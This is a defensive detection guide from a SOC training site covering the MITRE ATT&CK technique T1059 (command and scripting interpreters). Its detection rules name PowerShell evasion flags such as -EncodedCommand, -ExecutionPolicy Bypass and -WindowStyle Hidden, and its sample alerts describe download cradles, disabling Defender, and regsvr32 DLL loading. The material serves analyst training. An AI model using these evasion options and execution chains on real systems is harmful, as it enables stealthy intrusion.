Command and Scripting Interpreter (T1059) is a MITRE ATT&CK technique in the Execution tactic. SOC analysts detect it by monitoring for XDR, SIEM events, behavioral anomalies, and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such as Python. Attackers frequently leverage built-in interpreters because they are present on all systems, trusted by security tools, and often whitelisted by application control policies. PowerShell, WMI, cmd.exe, and bash are among the most commonly abused interpreters. The use of obfuscation, encoding, and living-off-the-land techniques makes detection challenging because malicious activity is conducted using legitimate system tools.
“Command and Scripting Interpreter is documented as technique T1059 in the MITRE ATT&CK knowledge base under the Execution tactic. Detection requires visibility into XDR, SIEM telemetry.”
The following detection strategies help SOC analysts identify Command and Scripting Interpreter activity. These methods apply across XDR, SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.
Enable PowerShell script block logging and module logging to capture the full decoded content of executed scripts, including deobfuscated payloads that may not be visible in process command line arguments alone.
Monitor for command interpreter processes spawned by unusual parent processes such as Microsoft Office applications, web browsers, email clients, or PDF readers, which strongly suggests malicious document-based execution.
Detect encoded PowerShell commands by alerting on process creation events containing -EncodedCommand, -enc, or -e flags, followed by Base64-encoded strings, which is a common technique for bypassing simple string-based detection.
Alert on the use of cmd.exe or PowerShell with flags designed to bypass execution policy or disable security features, such as -ExecutionPolicy Bypass, -NonInteractive, -WindowStyle Hidden, or -NoProfile.
Correlate scripting interpreter activity with network connections initiated shortly after execution to identify scripts performing download-cradle operations or establishing command-and-control communications.
These realistic alert examples show what Command and Scripting Interpreter looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.
PowerShell process launched with -EncodedCommand flag containing Base64-encoded payload that decodes to a download cradle fetching content from pastebin.com. Parent process is winword.exe, indicating macro-based execution. The downloaded script attempts to disable Windows Defender real-time protection before executing the second-stage payload.
Windows Command Shell was spawned as a child process of chrome.exe following navigation to a site serving a drive-by download. Command line arguments include net user and whoami reconnaissance commands, followed by a PowerShell download of a remote access tool from a domain registered 3 days ago.
WMI was used to execute a VBScript payload on 15 systems within the environment over a 10-minute window. The script connects to an external IP address and downloads a DLL file that is loaded into memory using regsvr32.exe. The lateral spread pattern and timing suggest automated execution by a worm or post-exploitation framework.
SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Command and Scripting Interpreter. Build detection skills with zero consequences — free forever.
An Indicator of Compromise (IOC) is an observable artifact, such as a file hash, IP address, domain name, URL, registry …
Read more GlossaryEndpoint Detection and Response (EDR) is a security technology that continuously monitors endpoint activity, recording p…
Read more GlossaryAlert triage is the structured process of reviewing, prioritizing, and investigating security alerts to determine their …
Read more GlossaryTactics, Techniques, and Procedures (TTPs) describe the behavioral patterns, methods, and operational processes threat a…
Read more Career PathTier 2 SOC Analysts handle the investigations that Tier 1 escalates. You dig into multi-stage attacks, coordinate contai…
Read more Career PathIncident Responders lead the technical response when confirmed breaches happen. You coordinate containment, run forensic…
Read more ToolThe XDR console in SOCSimulator replicates the investigation workflow of platforms like CrowdStrike Falcon, Microsoft De…
Read more ToolThe SIEM console in SOCSimulator replicates the workflow of enterprise platforms like Splunk Enterprise Security, Micros…
Read more ComparisonSOCSimulator wins on operational realism. You get multi-tool shift simulation with SLA pressure, noise injection, and al…
Read more ComparisonSOCSimulator is the better tool for dedicated SOC analyst preparation. TryHackMe is the better tool for broad cybersecur…
Read more PlaybookWhen alerts indicate unusual internal connections, RDP to servers from workstations, PsExec executions, or SMB access to…
Read more PlaybookWhen indicators suggest ransomware, mass file encryption, suspicious process behavior, ransom notes, or shadow copy dele…
Read moreWe use cookies to improve your experience and measure usage. Learn more